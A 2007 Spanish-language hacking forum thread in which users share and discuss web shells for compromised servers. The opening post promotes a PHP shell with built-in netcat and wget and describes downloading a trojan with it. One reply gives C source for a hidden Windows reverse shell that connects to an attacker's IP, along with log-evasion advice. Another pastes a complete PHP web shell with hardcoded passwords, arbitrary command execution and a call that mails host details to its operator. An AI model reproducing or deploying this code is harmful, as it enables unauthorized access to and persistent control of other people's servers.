Server Explorer PHP Shell - Updated

Iniciado por codebreak, 5 Abril 2007, 03:46 AM

0 Miembros y 1 Visitante están viendo este tema.

codebreak

Buenas,

He actualizado mi antigua shell (server explorer) por una algo mejor jaajaja.
Cree una shell desde cero e incluí la shell antigua (es decir, hay 2 interfaces de uso).

Lo nuevo:
- *Agregada la opcion de instalar Netcat.
- *Agregada la opcion de instalar wget.
- Incluye una simulación del comando "cat" de linux.
- Simulacion de shell (puedes navegar desde esta shell.. no solo ejecutar comandos, sino que explorar ya que recuerda los path).

* Las utilidades mencionadas, vienen incluidas en el código de la shell, de modo que no hay que descargarlas. Se instalan con un click.
Además, vienen codificadas en la base de la shell, de modo que si se instalan, la shell lo reconocera y habilitara los comandos "nc" y "wget" que estarán enganchados al sistema (se podrán ejecutar desde cualquier directorio, a lo linux). Es decir, puedes ingresar al disco "c:", luego a la carpeta "windows" y luego escribiendo "wger http://sitio.com/troyano.exe" podrás descargar un troyano directamente a ese directorio.



La shell:
http://rapidshare.com/files/24383052/cbreak.zip.html


Saludos,

PS: Ojala esta vez el personaje "MB" no me la plagie denuevo.


W4ck1ng Team Member

Xelmasloco

Suena interesante, bajando y probando..

Muchas gracias.- :rolleyes:

WHK

#2
 :P tiene la función de la shell y para instalar netcat con Wget... podriamos desarmar el c99 o el r57 para crear nuestros propios backdoors indetectables para unix y windows con detectores y todo lo demas.
Nota: Si tenía instalado netcat y wget pero no me lo reconoció como instalado. estaban en %windir%\system32\nc.exe y wget.exe creo que son direcciones tipicas que podrías incluir en la busqueda, ademas no necesitas usarel netcat para tener la shell inversa... basta compilar esto:


#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32"Giño

int main(int argc, char *argv[])
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
addr.sin_family = AF_INET;
addr.sin_port = htons(PUERTO);
addr.sin_addr.s_addr = inet_addr("TU IP O DOMINIO NO-IP")Giño;
connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
}

Cuando tenga tiempo trataré de ayudarte para que todos podamos colaborar o si lo prefieres me hago uno solo.
Recuerda además que si manejas una simulación de netcat directamente estarás enviando tus comandos directamente al log del servidor, por eso prefiero tomar una shell directa lo mas luego posible despues de tomarla desde el servidor web, se que algunos usan sniffers pero es menos que el 100% de probabilidades que teines sobre dejar tus huellas en el servidor  :P

WHK

Encontré algo que talves pueda interesarte.

SSH.PHP

<?php


error_reporting
(0);
session_start();

unset(
$user);        // Just in case ;-]
unset($pass);

if (
$_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']);

$cache_lines 1000;
$history_lines 100;
$history_chars 20;

$user[] = "root";                $pass[] = md5("hacked");
$user[] = "user";      $pass[] = md5("muie1234");
$to="";
$subject "php SSH";
$info .= "HOST:\t$HTTP_HOST\n";
$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
$info .= "IP:\t$REMOTE_ADDR\n";
$info .= "URL:\t$HTTP_REFERER\n";
$from "nobody@nobody.com";

if (
$_SESSION['login'])
{
   
mail ("$to","$subject","$info","$from");
}


$alias = array(
    
"la"    => "ls -la",
    
"rf"    => "rm -f",
    
"unbz2" => "tar -xjpf",
    
"ungz"  => "tar -xzpf"
);



if (!
$_SESSION['user']) {

    
$pr_login "Login:\n";
    
$pr_pass "Password:\n";
    
$err "Invalid login!\n\n";
    
$succ "Warning!
Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n"
;

    if (
$_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD

        
$_SESSION['output'] .= $pr_pass;

        if (
in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS

            
$key array_search($_SESSION['login'], $user);

            if (
$pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD
                
$_SESSION['output'] .= $err;
                unset(
$_SESSION['login']);
                
$prompt $pr_login;

            } else { 
//..................................... SUCCESSFUL LOGIN
                
$_SESSION['user'] = $_SESSION['login'];
                
$_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1);
                
$_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1);
                
$_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1);
                
$_SESSION['output'] .= $succ;
                
$prompt set_prompt();
                unset(
$_SESSION['login']);
            }

        } else { 
//......................................... NO SUCH USERNAME
            
$_SESSION['output'] .= $err;
            unset(
$_SESSION['login']);
            
$prompt $pr_login;
        }

    } else { 
//................................................ LOGIN PROCESS

        
if (!$_SESSION['login'] && !$_POST['cmd']) $prompt $pr_login;

        if (!
$_SESSION['login'] && $_POST['cmd']) {
            
$_SESSION['login'] = $_POST['cmd'];
            
$_SESSION['output'] .= substr($pr_login0, -1) . $_POST[cmd]\n";
            
$prompt $pr_pass;
        }
    }

} else { 
//........................................................ LOGGED IN



                            /*=-- MEMBERS AREA --=*\
                            \*=-- MEMBERS AREA --=*/


    
$prompt set_prompt();

    
chdir($_SESSION['dir']);

    if (
$_REQUEST['clear_hist']) //............................ CLEAR HISTORY
        
$_SESSION['history'] = "";

    if (
$_SESSION['history']) $hist_arr explode("\n"$_SESSION['history']);

    if (
$_POST['cmd']) {

        if (!
in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY
            
$hist_arr[] = $_POST['cmd'];
            
$_SESSION['history'] = implode("\n"$hist_arr);
        }

        if (
count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY
            
$start count($hist_arr) - $history_lines;
            
$_SESSION['history'] = "";

            for (
$i $start$i count($hist_arr); $i++)
                
$_SESSION['history'] .= $hist_arr[$i] . "\n";

            
$_SESSION['history'] = substr($_SESSION['history'], 0, -1);
            
$hist_arr explode("\n"$_SESSION['history']);
        }

        
$first_word first_word($_POST['cmd']);

        if (
array_key_exists($first_word$alias)) { //. CHECKING FOR ALIASES
            
$_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word));
            
$first_word first_word($_POST['cmd']);
        }

        switch (
$first_word) {

          case 
"clear":
            
$_SESSION['output'] = "";
            break;

          case 
"exit":
            
session_destroy();
            
refresh();
            break;

          case 
"cd":
            
$_SESSION['output'] .= $prompt;
                
$result shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
            
$result explode("\n"$result);
            
$_SESSION['dir'] = $result[count($result) - 2];

            if (
count($result) > 2//.............. WE HAVE AN ERROR MESSAGE
                
$result[0] = "\n" substr($result[0], strpos($result[0], "cd: ")) . "\n";
            else 
$result[0] = "\n";

                
$prompt set_prompt();
                
$_SESSION['output'] .= $_POST['cmd'] . $result[0];
                break;

          default:
            
$result shell_exec($_POST['cmd'] . " 2>&1");

            if (
substr($result, -1) != "\n"$result .= "\n";
            
$_SESSION['output'] .= $prompt $_POST['cmd'] . "\n" $result;

            
$rows preg_match_all('/\n/'$_SESSION['output'], $arr);
            unset(
$arr);

            if (
$rows $cache_lines) {
                    
preg_match('/(\n[^\n]*){' $cache_lines '}$/'$_SESSION['output'], $out);
                
$_SESSION['output'] = $out[0] . "\n";
            }
        }
    }
}



                             
/*=-- FUNCTIONS --=*\
                             \*=-- FUNCTIONS --=*/


function my_encode($str) {
    
$str str_replace("\\\\""\\"$str);
    
$str str_replace("\\\"""\""$str);
    
$str str_replace("\\'""'"$str);

    while (
strpos($str"  ") !== false$str str_replace("  "" "$str);

    return 
rtrim(ltrim($str));
}

function 
set_prompt() {
    global 
$_SESSION;

    return 
$_SESSION['whoami'] . "@" $_SESSION['host'] . " " substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ ";
}

function 
first_word($str) {
    list(
$str) = preg_split('/[ ;]/'$str);
    return 
$str;
}

function 
refresh() {
    global 
$_SERVER;

    
$self substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1);
    
header("Location: $self");
    die;
}



                             
/*=-- HTML PAGE --=*\
                             \*=-- HTML PAGE --=*/


$out substr(preg_replace('/<\/(textarea)/i''&lt;/\1'$_SESSION['output']), 0, -1);

?>
<HTML>

<HEAD>
  <TITLE>dis Shell Commander</TITLE>
  <STYLE TYPE="text/css"><!--

    INPUT, TEXTAREA, SELECT, OPTION, TD {
        color: #BBBBBB;
        background-color: #000000;
        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier;
    }

    TEXTAREA {
        overflow-y: auto;
        border-width: 0px;
        height: 100%;
        width: 100%;
        padding: 0px;
    }

    INPUT {
        border-width: 0px;
        height: 26px;
        width: 100%;
        padding-top: 5px;
    }

    SELECT, OPTION {
        color: #000000;
        background-color: #BBBBBB;
    }

    BODY {
        overflow-y: auto;
        margin: 0;
    }

  --></STYLE>
  <SCRIPT LANGUAGE="javascript"><!--

hist_arr = new Array();

<?php

foreach ($hist_arr as $key => $value) {
    
$value str_replace("\\""\\\\"$value);
    
$value str_replace("\"""\\\""$value);
    echo 
"hist_arr[$key] = \"$value\";\n";
}

?>


function parse_hist(key) {
    if (key < hist_arr.length) {
            if (key != "") {
            document.getElementById('input').value = hist_arr[key];
            document.getElementById('input').focus();
        }
    } else {
            window.location.href = "?clear_hist=1";
    }
}

function input_focus() {
    document.getElementById('input').focus();
}

function selection_to_clipboard() { // IE only!
    if (window.clipboardData && document.selection)
        window.clipboardData.setData("Text", document.selection.createRange().text);
}

if (window.clipboardData)
    document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false");

  --></SCRIPT>
</HEAD>
<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0">
<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%">
<TR>
  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD>

</TR>
<TR>
  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%">
    <TR>
    <FORM METHOD="POST" ACTION="">
      <TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD>
      <TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD>
    </FORM><?php

if ($hist_arr) {

    
?>
<TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)">
        <OPTION VALUE="">--- HISTORY</OPTION><?php

    
for ($i count($hist_arr) - 1$i >= 0$i--) {

        if (
strlen($hist_arr[$i]) > $history_chars$option substr($hist_arr[$i], 0$history_chars 3) . "...";
        else 
$option $hist_arr[$i];

        echo 
"<OPTION VALUE=\"" $i "\">$option</OPTION>";
    }

      
?>
<OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php

}

  
?>
</TR>

  </TABLE></TD>
</TR>
</TABLE>

<SCRIPT LANGUAGE="javascript"><!--
document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight;
--></SCRIPT>

</BODY>
</HTML><?

dmhack

jaja esta shell  esta muy buena amigo ya la  e probado en un server y funciona al 100% gracias por tu aportacion salu2


IWKY

whk a esta shell le faltan comandos se tendrian que añadir no?
Por internet libre http://red-sostenible.net/
El mejor momento de Dragon Ball Z --> Aqui

ÂìmBòt